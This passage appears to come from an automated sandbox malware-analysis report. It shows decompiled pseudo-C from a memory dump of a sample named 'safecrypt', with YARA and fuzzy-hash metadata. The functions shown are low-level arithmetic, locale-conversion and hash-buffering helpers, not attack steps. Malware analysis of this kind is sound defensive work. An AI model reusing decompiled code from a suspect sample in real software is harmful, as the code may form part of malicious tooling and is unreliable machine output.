                    									_t177 = _v36 - _t297 >> 1;
                    									__eflags = _t177 - _t344;
                    									if(_t177 < _t344) {
                    										L26:
                    										__eflags = _t344 - _t177;
                    										E0040F120(_v16, _v12, _v8, _t177, _t344 - _t177, _t332 - _t177, _v20);
                    									} else {
                    										while(1) {
                    											__eflags = _t177 - _t332;
                    											if(_t177 < _t332) {
                    												goto L26;
                    											}
                    											__eflags = _t177 - _t344;
                    											if(_t177 == _t344) {
                    												L30:
                    												E0040ECE0(_v8, _v16, _v12, _v8, _t177, _t344 - _t177, _t332 - _t177, _v20);
                    											} else {
                    												__eflags = _t177 - _t332;
                    												if(_t177 == _t332) {
                    													goto L30;
                    												} else {
                    													asm("cdq");
                    													_t177 = _t177 - _t297 >> 1;
                    													__eflags = _t177 - _t344;
                    													if(_t177 >= _t344) {
                    														continue;
                    													} else {
                    														goto L26;
                    													}
                    												}
                    											}
                    											goto L27;
                    										}
                    										goto L26;
                    									}
                    									goto L27;
                    								} else {
                    									__eflags = _t332 - 0x10;
                    									if(_t332 >= 0x10) {
                    										goto L21;
                    									} else {
                    										E0040F900(_t332, _v16, _v16, _v12, _t344, _v8);
                    									}
                    								}
                    							} else {
                    								_v16 = _t253 + _a4;
                    								E0040F120(_t253 + _a4, _v12, _v8, _t172, _t344 - _t172, _t332 - _t172, _v20);
                    								E0042C770(_a4 + (_a16 + _a16 + _t344 + _t332) * 8, 0, _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332);
                    							}
                    						} else {
                    							_v16 = _t253 + _a4;
                    							E0040ECE0(_v12, _t253 + _a4, _v12, _v8, _t172, _t344 - _t172, _t332 - _t172, _v20);
                    							E0042C770(_a4 + (_a16 + _a16 + _v36 * 2) * 8, 0, _v24 - (_v36 << 4));
                    						}
                    					} else {
                    						_v28 = _t237 + (_t248 + _t248) * 8;
                    						_t73 = _t237 + 0x40; // 0x40f831
                    						L00403870(_t73, _t237, _t237, _t332, _t344, __eflags, _t237 + (_t248 + _t248) * 8);
                    						L00403870(_a12, _t237, _a8, _t332, _t344, __eflags, _a4);
                    						_v16 = _a4 + (_a16 + _a16) * 8;
                    						E0040F900(_t332, _a12 + 0x40, _a4 + (_a16 + _a16) * 8, _a8 + 0x40, _t344, _a12 + 0x40);
                    						E0042C770(_a4 + (_a16 + _a16 + _t344 + _t332) * 8, 0, _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332);
                    						L27:
                    					}
                    					_t347 = _a16 + _a16;
                    					_t181 = E00403330(_t237, _a4, _v16, _t347);
                    					__eflags = _v32;
                    					_t334 = _t181;
                    					_t182 = _v28;
                    					_push(_t347);
                    					if(_v32 == 0) {
                    						_push(_t237);
                    						_push(_t182);
                    						_push(_t182);
                    						_t335 = _t334 + E00403330();
                    						__eflags = _t335;
                    					} else {
                    						_push(_t182);
                    						_push(_t237);
                    						_push(_t182);
                    						_t335 = _t334 - E004035D0();
                    					}
                    					_t300 = _a16;
                    					_t238 = _a4;
                    					_t185 = E00403330(_t238 + _t300 * 8, _t238 + _t300 * 8, _v28, _t347);
                    					_t336 = _t335 + _t185;
                    					__eflags = _t336;
                    					if(_t336 != 0) {
                    						_t185 = _t336;
                    						asm("cdq");
                    						_t257 = _t238 + (_t347 + _a16) * 8;
                    						_t339 = _t185 +  *_t257;
                    						_t350 = _t300;
                    						asm("adc esi, [ecx+0x4]");
                    						 *_t257 = _t339;
                    						_t257[1] = _t350;
                    						__eflags = _t350 - _t300;
                    						if(__eflags <= 0) {
                    							if(__eflags < 0) {
                    								L37:
                    								_t186 = _t257[2];
                    								_t301 = _t257[3];
                    								_t257 =  &(_t257[2]);
                    								_t187 = _t186 + 1;
                    								asm("adc edx, 0x0");
                    								 *_t257 = _t187;
                    								_t185 = _t187 | _t301;
                    								__eflags = _t185;
                    								_t257[1] = _t301;
                    							} else {
                    								__eflags = _t339 - _t185;
                    								if(_t339 < _t185) {
                    									do {
                    										goto L37;
                    									} while (_t185 == 0);
                    								}
                    							}
                    						}
                    					}
                    					return _t185;
                    				} else {
                    					return E0040F900(_a24 + _t241, _a4, _a4, _a8, _t241 + _a20, _a12);
                    				}
                    			}


                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a602f30de6607c77212270826deeafbb89ae01382e4b636a7c81bc4f03608c6e
                    • Instruction ID: 58cebf139317df1b6fde4ec56a5f34d25ad5054f39d3ae83fa109181bd26d976
                    • Opcode Fuzzy Hash: a602f30de6607c77212270826deeafbb89ae01382e4b636a7c81bc4f03608c6e
                    • Instruction Fuzzy Hash: 26E15DB5A00109AFDB14DF69CC81DAF77B9EF88304F14857DF809A7385E634AE158BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E0040ECE0(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed int _a20, signed int _a24, intOrPtr _a28) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				void* __ebx;
                    				signed int __edi;
                    				signed int __esi;
                    				void* __ebp;
                    				signed int _t157;
                    				signed int _t161;
                    				void* _t164;
                    				signed int _t165;
                    				signed int _t169;
                    				signed int _t174;
                    				signed int _t177;
                    				void* _t179;
                    				signed int _t181;
                    				signed int _t182;
                    				signed int _t183;
                    				void* _t222;
                    				signed int _t224;
                    				signed int _t228;
                    				signed int _t232;
                    				signed int _t233;
                    				signed int _t239;
                    				signed int* _t248;
                    				signed int _t262;
                    				intOrPtr _t266;
                    				signed int _t275;
                    				signed int _t276;
                    				signed int _t285;
                    				signed int _t286;
                    				intOrPtr _t290;
                    				signed int _t291;
                    				signed int _t292;
                    				signed int _t294;
                    				signed int _t297;
                    				signed int _t299;
                    				void* _t301;
                    				void* _t302;
                    
                    				_t233 = _a20;
                    				_t286 = _a16;
                    				asm("cdq");
                    				_t157 = _a24;
                    				_t297 = _t286 - __edx >> 1;
                    				_t266 = _t297 + _t157;
                    				_t222 = _t297 + _t233;
                    				_v32 = _t266;
                    				if(_t286 != 8) {
                    					__eflags = _t286 - 0x10;
                    					if(_t286 >= 0x10) {
                    						_v16 = _a8 + _t297 * 8;
                    						_v12 = _a12 + _t297 * 8;
                    						_v20 = 0;
                    						_v8 = 0;
                    						_v24 = _t297 - _t222;
                    						_v28 = _t266 - _t297;
                    						_t161 = E0040DCB0(_t297 - _t222, _t222, _a8, _v16);
                    						_t270 = _v12;
                    						_v36 = _t161 + _t161 * 2;
                    						_t164 = E0040DCB0(_t266 - _t297, _v32, _v12, _a12);
                    						_t290 = _a28;
                    						_t42 = _t164 + 4; // 0x40f342
                    						_t165 = _v36 + _t42;
                    						_t302 = _t301 + 0x10;
                    						__eflags = _t165 - 8;
                    						if(_t165 <= 8) {
                    							switch( *((intOrPtr*)(_t165 * 4 +  &M0040F0F8))) {
                    								case 0:
                    									E0040EA50(_v16, _t290, _a8, _t222, _t222 - _t297);
                    									_t313 = _t302 + 0xc;
                    									_t210 = _a24 + _t297;
                    									_t270 = _t297 - _t210;
                    									_push(_t297 - _t210);
                    									_push(_t210);
                    									_t211 = _a12;
                    									_push(_v12);
                    									goto L14;
                    								case 1:
                    									_v8 = 1;
                    									goto L16;
                    								case 2:
                    									__eax = _a8;
                    									__ebx = __ebx - __esi;
                    									__eax = _v16;
                    									__ecx = __edi;
                    									__eax = E0040EA50(_v16, __edi, _a8, __ebx, __ebx - __esi);
                    									__ecx = _v28;
                    									__edx = _a24;
                    									__esi + _a24 = _a12;
                    									__eax = _v12;
                    									__ecx = __edi + __esi * 8;
                    									__eax = E0040EA50(_v12, __ecx, _a12, __esi + _a24, _v28);
                    									_v20 = 1;
                    									goto L15;
                    								case 3:
                    									__ecx = _v24;
                    									__edx = _v16;
                    									__eax = _a8;
                    									__ecx = __edi;
                    									__eax = E0040EA50(_a8, __edi, _v16, __ebx, _v24);
                    									__edx = _a24;
                    									__eax = __esi + _a24;
                    									__esi = __esi - __esi + _a24;
                    									__eax = _v12;
                    									__eax = _a12;
                    									__ecx = __edi + __esi * 8;
                    									__eax = E0040EA50(_a12, __ecx, _v12, _a12, __esi - __esi + _a24);
                    									_v20 = 1;
                    									goto L15;
                    								case 4:
                    									__ecx = _v24;
                    									__edx = _v16;
                    									__eax = _a8;
                    									__ecx = __edi;
                    									E0040EA50(_a8, __edi, _v16, __ebx, _v24) = _v28;
                    									__ecx = _a24;
                    									__edx = _a12;
                    									_push(_v28);
                    									__eax = __esi + __ecx;
                    									_push(__esi + __ecx);
                    									__eax = _v12;
                    									_push(_a12);
                    									L14:
                    									E0040EA50(_t211, _t290 + _t297 * 8);
                    									L15:
                    									_t302 = _t313 + 0xc;
                    									goto L16;
                    							}
                    						}
                    						L16:
                    						__eflags = _t297 - 4;
                    						if(_t297 != 4) {
                    							__eflags = _t297 - 8;
                    							if(_t297 != 8) {
                    								goto L30;
                    							} else {
                    								__eflags = _a20;
                    								if(_a20 != 0) {
                    									goto L30;
                    								} else {
                    									__eflags = _a24;
                    									if(_a24 != 0) {
                    										goto L30;
                    									} else {
                    										_t228 = _a16 + _a16 + _a16 + _a16 + _a16 + _a16 + _a16 + _a16;
                    										__eflags = _v8;
                    										_v8 = _t228;
                    										if(__eflags != 0) {
                    											_t223 = _t228 + _t290;
                    											__eflags = _t228 + _t290;
                    											E0042C770(_t228 + _t290, 0, 0x80);
                    										} else {
                    											_t223 = _t228 + _t290;
                    											_t100 = _t290 + 0x40; // 0x40f37e
                    											L00403870(_t100, _t228 + _t290, _t290, _t290, _t297, __eflags, _t228 + _t290);
                    										}
                    										L00403870(_a12, _t223, _a8, _t290, _t297, __eflags, _a4);
                    										_v8 = _a4 + _v8;
                    										L00403870(_a12 + 0x40, _t223, _a8 + 0x40, _t290, _t297, __eflags, _a4 + _v8);
                    									}
                    								}
                    							}
                    						} else {
                    							__eflags = _a20;
                    							if(_a20 != 0) {
                    								L30:
                    								_t239 = _a16;
                    								_t168 = (_t239 << 4) + _t290;
                    								__eflags = _v8;
                    								_v28 = (_t239 << 4) + _t290;
                    								if(_v8 != 0) {
                    									_t169 = _t239 * 8;
                    									_t223 = _t169 + _t290;
                    									_v8 = _t169;
                    									E0042C770(_t169 + _t290, 0, _t169);
                    								} else {
                    									_t224 = _t239 * 8;
                    									_v8 = _t224;
                    									_t223 = _t224 + _t290;
                    									E0040ECE0(_t270, _t224 + _t290, _t290, _t290 + _t297 * 8, _t297, 0, 0, _t168);
                    								}
                    								E0040ECE0(_a12, _a4, _a8, _a12, _t297, 0, 0, _v28);
                    								_t174 = _a4 + _v8;
                    								__eflags = _t174;
                    								_v8 = _t174;
                    								E0040ECE0(_v12, _t174, _v16, _v12, _t297, _a20, _a24, _v28);
                    							} else {
                    								__eflags = _a24;
                    								if(_a24 != 0) {
                    									goto L30;
                    								} else {
                    									_t232 = _a16 + _a16 + _a16 + _a16 + _a16 + _a16 + _a16 + _a16;
                    									__eflags = _v8;
                    									_v8 = _t232;
                    									if(__eflags != 0) {
                    										_t223 = _t232 + _t290;
                    										__eflags = _t232 + _t290;
                    										E0042C770(_t232 + _t290, 0, 0x40);
                    									} else {
                    										_t223 = _t232 + _t290;
                    										_t86 = _t290 + 0x20; // 0x40f35e
                    										E00407AB0(_t86, _t290, __eflags, _t232 + _t290);
                    									}
                    									E00407AB0(_a12, _a8, __eflags, _a4);
                    									_v8 = _a4 + _v8;
                    									E00407AB0(_a12 + 0x20, _a8 + 0x20, __eflags, _a4 + _v8);
                    								}
                    							}
                    						}
                    						_t177 = E00403330(_t290, _a4, _v8, _a16);
                    						__eflags = _v20;
                    						_a24 = _t177;
                    						if(_v20 == 0) {
                    							_t179 = E00403330(_t223, _t223, _t290, _a16);
                    							_t139 =  &_a24;
                    							 *_t139 = _a24 + _t179;
                    							__eflags =  *_t139;
                    							_t291 = _a24;
                    						} else {
                    							_t291 = _a24 - E004035D0(_t223, _t290, _t223, _a16);
                    						}
                    						_t275 = _a16;
                    						_t181 = E00403330(_a4 + _t297 * 8, _a4 + _t297 * 8, _t223, _t275);
                    						_t292 = _t291 + _t181;
                    						__eflags = _t292;
                    						if(_t292 != 0) {
                    							_t248 = _a4 + (_t297 + _a16) * 8;
                    							_t299 = _t248[1];
                    							_t181 = _t292;
                    							asm("cdq");
                    							_t294 =  *_t248 + _t181;
                    							asm("adc esi, edx");
                    							 *_t248 = _t294;
                    							_t248[1] = _t299;
                    							__eflags = _t299 - _t275;
                    							if(__eflags <= 0) {
                    								if(__eflags < 0) {
                    									L41:
                    									_t182 = _t248[2];
                    									_t276 = _t248[3];
                    									_t248 =  &(_t248[2]);
                    									_t183 = _t182 + 1;
                    									asm("adc edx, 0x0");
                    									 *_t248 = _t183;
                    									_t181 = _t183 | _t276;
                    									__eflags = _t181;
                    									_t248[1] = _t276;
                    								} else {
                    									__eflags = _t294 - _t181;
                    									if(_t294 < _t181) {
                    										do {
                    											goto L41;
                    										} while (_t181 == 0);
                    									}
                    								}
                    							}
                    						}
                    						goto L42;
                    					} else {
                    						goto L5;
                    					}
                    				} else {
                    					if(_t233 != 0) {
                    						L5:
                    						_t300 = _a4;
                    						E0040F900(_t157 + _t286, _a8, _a4, _a8, _t233 + _t286, _a12);
                    						_t262 = _a20;
                    						_t285 = _a24;
                    						_t181 = _t262 + _t285;
                    						__eflags = _t181;
                    						if(_t181 >= 0) {
                    							L42:
                    							return _t181;
                    						} else {
                    							__eflags = _t262 + _t286 * 2 + _t285;
                    							return E0042C770(_t300 + (_t262 + _t286 * 2 + _t285) * 8, 0, _t181 * 0xfffffff8);
                    						}
                    					} else {
                    						_t319 = _t157;
                    						if(_t157 != 0) {
                    							goto L5;
                    						} else {
                    							return L00403870(_a12, _t222, _a8, _t286, _t297, _t319, _a4);
                    						}
                    					}
                    				}
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset
                    • String ID:
                    • API String ID: 2102423945-0
                    • Opcode ID: 057eb5bc42fc12bac5a74c85d435e80052a16c3e30746c0e74256393d5dd3c59
                    • Instruction ID: 6539336be00eb58aaa4580814aa386b459e0d20e3f44f275eda09596c87c6cf7
                    • Opcode Fuzzy Hash: 057eb5bc42fc12bac5a74c85d435e80052a16c3e30746c0e74256393d5dd3c59
                    • Instruction Fuzzy Hash: CFE183B5A00109ABDB10DF59DC81EAF77B9EF88304F14853AF805A7381E635EE15CBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0042D64A(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                    				char _v8;
                    				signed int _v12;
                    				char _v20;
                    				char _t43;
                    				char _t46;
                    				signed int _t53;
                    				signed int _t54;
                    				intOrPtr _t56;
                    				int _t57;
                    				int _t58;
                    				char _t59;
                    				short* _t60;
                    				int _t65;
                    				char* _t73;
                    
                    				_t73 = _a8;
                    				if(_t73 == 0 || _a12 == 0) {
                    					L5:
                    					return 0;
                    				} else {
                    					if( *_t73 != 0) {
                    						E00425EF9( &_v20, __edi, _a16);
                    						_t43 = _v20;
                    						__eflags =  *(_t43 + 0x14);
                    						if( *(_t43 + 0x14) != 0) {
                    							_t46 = E0042CAED( *_t73 & 0x000000ff,  &_v20);
                    							__eflags = _t46;
                    							if(_t46 == 0) {
                    								__eflags = _a4;
                    								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                    								if(__eflags != 0) {
                    									L10:
                    									__eflags = _v8;
                    									if(_v8 != 0) {
                    										_t53 = _v12;
                    										_t11 = _t53 + 0x70;
                    										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                    										__eflags =  *_t11;
                    									}
                    									return 1;
                    								}
                    								L21:
                    								_t54 = E00426D35(__eflags);
                    								 *_t54 = 0x2a;
                    								__eflags = _v8;
                    								if(_v8 != 0) {
                    									_t54 = _v12;
                    									_t33 = _t54 + 0x70;
                    									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                    									__eflags =  *_t33;
                    								}
                    								return _t54 | 0xffffffff;
                    							}
                    							_t56 = _v20;
                    							_t65 =  *(_t56 + 0xac);
                    							__eflags = _t65 - 1;
                    							if(_t65 <= 1) {
                    								L17:
                    								__eflags = _a12 -  *(_t56 + 0xac);
                    								if(__eflags < 0) {
                    									goto L21;
                    								}
                    								__eflags = _t73[1];
                    								if(__eflags == 0) {
                    									goto L21;
                    								}
                    								L19:
                    								_t57 =  *(_t56 + 0xac);
                    								__eflags = _v8;
                    								if(_v8 == 0) {
                    									return _t57;
                    								}
                    								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                    								return _t57;
                    							}
                    							__eflags = _a12 - _t65;
                    							if(_a12 < _t65) {
                    								goto L17;
                    							}
                    							__eflags = _a4;
                    							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                    							__eflags = _t58;
                    							_t56 = _v20;
                    							if(_t58 != 0) {
                    								goto L19;
                    							}
                    							goto L17;
                    						}
                    						_t59 = _a4;
                    						__eflags = _t59;
                    						if(_t59 != 0) {
                    							 *_t59 =  *_t73 & 0x000000ff;
                    						}
                    						goto L10;
                    					} else {
                    						_t60 = _a4;
                    						if(_t60 != 0) {
                    							 *_t60 = 0;
                    						}
                    						goto L5;
                    					}
                    				}
                    			}

                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042D67E
                    • __isleadbyte_l.LIBCMT ref: 0042D6B1
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00425BCF,?,00000000,00000000,?,?,?,?,00425BCF,00000000), ref: 0042D6E2
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00425BCF,00000001,00000000,00000000,?,?,?,?,00425BCF,00000000), ref: 0042D750
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: 425d53de095f62647028274ab6969f117359ba5a39b3b4bce69eedd4ce8d147e
                    • Instruction ID: 723d65060075842775bd0d3a19ed2c330435f1cc2d12440b06643c8d394e6fac
                    • Opcode Fuzzy Hash: 425d53de095f62647028274ab6969f117359ba5a39b3b4bce69eedd4ce8d147e
                    • Instruction Fuzzy Hash: A031E270F00269EFDF10DF64E884AAE7BA0EF05310F9485AAE4688B2A1D734DD41CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E00420A20(signed int __eax, void* __ecx, intOrPtr _a4) {
                    				intOrPtr _v8;
                    				intOrPtr _t32;
                    				unsigned int _t35;
                    				signed int _t49;
                    				signed int _t51;
                    				intOrPtr _t61;
                    				unsigned int _t66;
                    				void* _t70;
                    				void* _t74;
                    
                    				_push(__ecx);
                    				_t66 = __eax;
                    				_t70 = __ecx;
                    				_t56 = _a4;
                    				_v8 = _a4;
                    				if(__eax == 0) {
                    					L13:
                    					return 1;
                    				} else {
                    					_t32 =  *((intOrPtr*)(__ecx + 0x20));
                    					_t61 = _t32 + __eax * 8;
                    					if(_t61 < _t32) {
                    						 *((intOrPtr*)(__ecx + 0x24)) =  *((intOrPtr*)(__ecx + 0x24)) + 1;
                    					}
                    					 *((intOrPtr*)(_t70 + 0x24)) =  *((intOrPtr*)(_t70 + 0x24)) + (_t66 >> 0x1d);
                    					_t35 =  *(_t70 + 0x68);
                    					 *((intOrPtr*)(_t70 + 0x20)) = _t61;
                    					if(_t35 == 0) {
                    						L8:
                    						_t49 = _t66 >> 6;
                    						if(_t49 != 0) {
                    							E00420DF0(_t70, _v8, _t49);
                    							_t51 = _t49 << 6;
                    							_v8 = _v8 + _t51;
                    							_t74 = _t74 + 8;
                    							_t66 = _t66 - _t51;
                    						}
                    						if(_t66 != 0) {
                    							 *(_t70 + 0x68) = _t66;
                    							E0042E030(_t70 + 0x28, _v8, _t66);
                    						}
                    						goto L13;
                    					} else {
                    						if(_t66 >= 0x40 || _t35 + _t66 >= 0x40) {
                    							E0042E030(_t70 + _t35 + 0x28, _t56, 0x40);
                    							E00420DF0(_t70, _t70 + 0x28, 1);
                    							_v8 = 0x40 + _a4;
                    							_t66 = _t66 - 0x40 - _t35;
                    							 *(_t70 + 0x68) = 0;
                    							E0042C770(_t70 + 0x28, 0, 0x40);
                    							_t74 = _t74 + 0x20;
                    							goto L8;
                    						} else {
                    							E0042E030(_t70 + _t35 + 0x28, _t56, _t66);
                    							 *(_t70 + 0x68) =  *(_t70 + 0x68) + _t66;
                    							return 1;
                    						}
                    					}
                    				}
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID:
                    • API String ID: 1357608183-0
                    • Opcode ID: 734ecc2d179982feb8d20665ce0804b78eda164305349a80a465f68e8e3f84a1
                    • Instruction ID: 15a7f42b16d9fd045d5e8a29c09042f786c97f827ed3a8ea16cb05c13713ca9b
                    • Opcode Fuzzy Hash: 734ecc2d179982feb8d20665ce0804b78eda164305349a80a465f68e8e3f84a1
                    • Instruction Fuzzy Hash: DE21D6B27107155BD720CA5AE8C0A9BB3E9EB98314F90062FE84987701E675AE45C794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E00421DF0(signed int __eax, void* __ecx, intOrPtr _a4) {
                    				intOrPtr _v8;
                    				intOrPtr _t32;
                    				unsigned int _t35;
                    				signed int _t50;
                    				signed int _t52;
                    				intOrPtr _t60;
                    				unsigned int _t64;
                    				void* _t68;
                    				void* _t72;
                    
                    				_push(__ecx);
                    				_t64 = __eax;
                    				_t68 = __ecx;
                    				_t57 = _a4;
                    				_v8 = _a4;
                    				if(__eax == 0) {
                    					L13:
                    					return 1;
                    				} else {
                    					_t32 =  *((intOrPtr*)(__ecx + 0x14));
                    					_t60 = _t32 + __eax * 8;
                    					if(_t60 < _t32) {
                    						 *((intOrPtr*)(__ecx + 0x18)) =  *((intOrPtr*)(__ecx + 0x18)) + 1;
                    					}
                    					 *((intOrPtr*)(_t68 + 0x18)) =  *((intOrPtr*)(_t68 + 0x18)) + (_t64 >> 0x1d);
                    					_t35 =  *(_t68 + 0x5c);
                    					 *((intOrPtr*)(_t68 + 0x14)) = _t60;
                    					if(_t35 == 0) {
                    						L8:
                    						_t50 = _t64 >> 6;
                    						if(_t50 != 0) {
                    							E00422030(_v8, _t68, _t50);
                    							_t52 = _t50 << 6;
                    							_v8 = _v8 + _t52;
                    							_t72 = _t72 + 8;
                    							_t64 = _t64 - _t52;
                    						}
                    						if(_t64 != 0) {
                    							 *(_t68 + 0x5c) = _t64;
                    							E0042E030(_t68 + 0x1c, _v8, _t64);
                    						}
                    						goto L13;
                    					} else {
                    						if(_t64 >= 0x40 || _t35 + _t64 >= 0x40) {
                    							E0042E030(_t68 + _t35 + 0x1c, _t57, 0x40);
                    							E00422030(_t68 + 0x1c, _t68, 1);
                    							_v8 = 0x40 + _a4;
                    							_t64 = _t64 - 0x40 - _t35;
                    							 *(_t68 + 0x5c) = 0;
                    							E0042C770(_t68 + 0x1c, 0, 0x40);
                    							_t72 = _t72 + 0x20;
                    							goto L8;
                    						} else {
                    							E0042E030(_t68 + _t35 + 0x1c, _t57, _t64);
                    							 *(_t68 + 0x5c) =  *(_t68 + 0x5c) + _t64;
                    							return 1;
                    						}
                    					}
                    				}
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID:
                    • API String ID: 1357608183-0
                    • Opcode ID: cb9ce0cab9bbbeafe02c5e783849b871122adabde1c7e9219b9e8f6634ab46ed
                    • Instruction ID: ffa57fb688d28f284f5b8a2691d87fd22a2d99951116dd7e2b5970d7d430d9e1
                    • Opcode Fuzzy Hash: cb9ce0cab9bbbeafe02c5e783849b871122adabde1c7e9219b9e8f6634ab46ed
                    • Instruction Fuzzy Hash: 1921E5B2B10715AFD720CE59EC80F5BB3EDEF94354F41462FE90587201E6B9AE058B94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041D2F0(void* __eax, void* __ecx, intOrPtr _a4) {
                    				intOrPtr _v8;
                    				intOrPtr _t24;
                    				unsigned int _t25;
                    				unsigned int _t40;
                    				void* _t42;
                    				intOrPtr _t47;
                    				signed int _t54;
                    				signed int _t56;
                    				void* _t61;
                    				void* _t65;
                    
                    				_t50 = _a4;
                    				_t61 = __eax;
                    				_t24 =  *((intOrPtr*)(__eax + 0x14));
                    				_t47 = _t24 + 0x100;
                    				_t40 = 0x20;
                    				_v8 = _a4;
                    				if(_t47 < _t24) {
                    					 *((intOrPtr*)(__eax + 0x18)) =  *((intOrPtr*)(__eax + 0x18)) + 1;
                    				}
                    				_t25 =  *(_t61 + 0x5c);
                    				 *((intOrPtr*)(_t61 + 0x14)) = _t47;
                    				if(_t25 == 0) {
                    					L6:
                    					_t54 = _t40 >> 6;
                    					if(_t54 != 0) {
                    						E0041D510(_v8, _t61, _t54);
                    						_t56 = _t54 << 6;
                    						_v8 = _v8 + _t56;
                    						_t65 = _t65 + 8;
                    						_t40 = _t40 - _t56;
                    					}
                    					if(_t40 != 0) {
                    						 *(_t61 + 0x5c) = _t40;
                    						E0042E030(_t61 + 0x1c, _v8, _t40);
                    					}
                    					return 1;
                    				} else {
                    					_t42 = _t61 + 0x1c;
                    					if(_t25 + 0x20 >= 0x40) {
                    						E0042E030(_t25 + _t42, _t50, 0x40);
                    						E0041D510(_t42, _t61, 1);
                    						_v8 = 0x40 + _a4;
                    						_t40 = 0x20 - 0x40 - _t25;
                    						 *(_t61 + 0x5c) = 0;
                    						E0042C770(_t61 + 0x1c, 0, 0x40);
                    						_t65 = _t65 + 0x20;
                    						goto L6;
                    					} else {
                    						E0042E030(_t42 + _t25, _t50, 0x20);
                    						 *(_t61 + 0x5c) =  *(_t61 + 0x5c) + 0x20;
                    						return 1;
                    					}
                    				}
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID:
                    • API String ID: 1357608183-0
                    • Opcode ID: ec377b130e888cd561b38ce32847682b1ff8cb7c1c04f26f1eeafb4f59340c5f
                    • Instruction ID: c515fe6990ca87537032bb9f1e22372e091eb035bf9d1419eb509839fa59445c
                    • Opcode Fuzzy Hash: ec377b130e888cd561b38ce32847682b1ff8cb7c1c04f26f1eeafb4f59340c5f
                    • Instruction Fuzzy Hash: AA21EAB2B003156BD720DE5ADC80F9BB3E9EB88358F00056EF90987741D2B99D4587A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 22%
                    			E0041D149(void* __ebx, void* __ebp, void* _a20, char* _a28, char _a68, intOrPtr* _a76, intOrPtr _a80, struct _MEMORYSTATUS _a160, char _a1040, signed int _a2164) {
                    				void* __edi;
                    				intOrPtr* _t18;
                    				intOrPtr _t23;
                    				intOrPtr* _t24;
                    				intOrPtr _t26;
                    				intOrPtr* _t27;
                    				void* _t34;
                    				intOrPtr _t35;
                    				struct HINSTANCE__* _t44;
                    				intOrPtr _t45;
                    				intOrPtr _t46;
                    				signed int _t49;
                    				long long* _t50;
                    				long long* _t52;
                    				long long* _t53;
                    				long long _t62;
                    
                    				_t34 = __ebx;
                    				do {
